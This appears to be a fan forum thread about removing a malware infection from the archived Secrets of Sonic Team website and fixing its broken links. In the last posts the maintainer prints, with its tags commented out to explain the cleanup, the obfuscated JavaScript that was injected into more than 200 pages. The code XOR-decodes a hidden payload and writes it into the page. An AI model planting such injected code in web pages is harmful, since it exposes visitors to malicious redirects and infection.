As many of you are aware, whenever you access the old Secrets of Sonic Team (SOST) website (sost.emulationzone.org), a warning message is displayed indicating that the site is infected with malware. This weekend, I will start going through the website with the goal of purging the rogue script from the infected files. I'll post a follow-up message once this has been completed. While I am doing that, now would be good time to address any other issues with the website. This includes: - broken links - pages with scripting / permission errors - pages with glaring mistakes If there is anything you would like to see fixed, please reply to this thread and I'll try to correct it. Thanks PS: I have no intention of reopening the site, so please don't ask. I simply want to get the site back in an operational state.
Does anyone have any recommendations for an FTP client that can sync a local folder structure against a remote server? Thanks
FileZilla works well for that; it displays both your folder trees side by side. It doesn't do any automatic synchronization that I'm aware of, but it makes it easy to do it manually.
Nice to see you're getting rid of that malware, that site's a nice thing to preserve clean. Like that link to my site's old address! :v:
Ahh.. so that's why I was redirected to a another website when I recently visited SOST. I visited before the warning existed, in order to try look up some scans on the Sonic CD manual/box art. Thanks for posting about this; imma be scanning my computer for possible viruses, just in case, I caught something when I last visited.
I made this offer already years ago at this point and it still stands: I would totally be willing to maintain the site if you'd reopen it.
That'd be amazing if you did, SOST was the first scene website I ever visited back when we first got the internet in late 2003/early 2004 and the website was great for the information. I'd help out as well if it relaunched as I have a lot more free time now as I have to wait for the second stage approval before I can go school over here.
That virus was the reason I haven't been to SOST in ages. =P 'Course, now that I think about it, I probably could've accessed it on my iPod the whole time without any problems. D'oh.
The problem is, if you start fixing mistakes you'll suddenly end up adding pieces of information found by the community in the x number of years since SOST closed. I.e. you'll be repeating some of the aims of Sonic Retro's wiki. I'm pretty sure everything meaningful from SOST is mirrored here. Certainly worth purging it of that malware though.
Please provide location of page link (URL) along with incorrect and correct info. That's is true, which is the reason why I am not interested in restarting the SOST page. Sonic Retro has done a excellent job in compiling "Sonic Secrets" information collected over the past decade, so there is no need to repeat their efforts. Instead, I am interested in correcting "gross" mistakes. Ex: "Here's a picture of Eggman" when it's really a pic of, say, Sonic. SOST, for the most part, is now in "archival" form. But if any parts of it are broken, I'd like to fix them. Ex: there are links to Sonic Adventure beta video clips that are broken, but the content is on the site. I'll be addressing that.
Oh. It's on the right column of the home page. There's a link to sonicdatabase.tk instead of sonicdatabase.com. =|
Good news: the Wowtribes malware infect has been removed! :specialed: The rouge script impacted over 200 files. Please check out the site and let me know if there are any locations I might have missed. I also examined the links under "affiliates" and noticed some issues: IceKnight: I fixed the link to SonicDataBase.com Sonicology - http://sonicology.fateback.com/ Was the site discontinued or do they have a new link? S2Beta - http://www.s2beta.com/ Leads to a generic ISP page. Was the site discontinued? DigiBase - http://sonicveg.digibase.ca/ Leads to a blank page. Was the site discontinued?
The website is on http://s2beta.sonicretro.org now, although the content is also available on the Sonic Retro wiki.
This is still reported as malware, though it may be just cached. How do we know if the script is there, how does it look like in the HTML source code?
Try hitting refresh, or press the "control" key while hitting the refresh button to force the browser to download the file(s). The Sonic 1 page is reported as clean by Chrome for me. As for the malware, some virus or worm gained access to the Apache webserver and injected a javascript function into numerous web pages on the server. Many sites, not just SOST, were impacted. SOST was the most difficult for me to address because I don't have a copy of the original site prior to the infection. A copy of the script that was injected is below. I converted the "script" tags to comments so it would not run. <!-- script -->function jIxnUrxy(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(jIxnUrxy()>100000){window.name=3884595755666519495547423784526814254729275736776229961339682363787169177551228741637751728945214929;var rVwKZEnt='%u0032%u000e%u0067%u0001%u0073%u0012%u007f%u001a%u003a%u004d%u0024%u0040%u0034%u005c%u0061%u0050%u0070%u0018%u007d%u0014%u0073%u001b%u006f%u0052%u0063%u0043%u0021%u004e%u003c%u0058%u003d%u004f%u0072%u0042%u0062%u0004%u0076%u0017%u007a%u001f%u007d%u0012%u0060%u0004%u0061%u0013%u002e%u001e%u003e%u004d%u003f%u005c%u0061%u0046%u002e%u005a%u002e%u005e%u0064%u004b%u0064%u0013%u007c%u000b%u007f%u000d%u0064%u0006%u0063%u0010%u003e%u005d%u0032%u005f%u0070%u001c%u0073%u0014%u0067%u0048%u0021%u004f%u002b%u004e%u0036%u0018%u0068%u0000%u0070%u0057%u0069%u0055%u007a%u0013%u0075%u0007%u0066%u000b%u006e%u0050';var gDFWvB=unescape(rVwKZEnt);FWjdPIg=window.name;for(QqsUFCi=0;QqsUFCi<gDFWvB.length-1;QqsUFCi++){mJAFZuhRe=gDFWvB.charCodeAt(QqsUFCi);document.write(String.fromCharCode( (gDFWvB.charCodeAt(QqsUFCi+1)-0) ^ mJAFZuhRe) );}}<!-- /script -->
I never actually visited Sonic Vegemite at all, but is http://sonicveg.com/ the same site? Digibase itself is still at http://www.digibase.ca , as it always has been.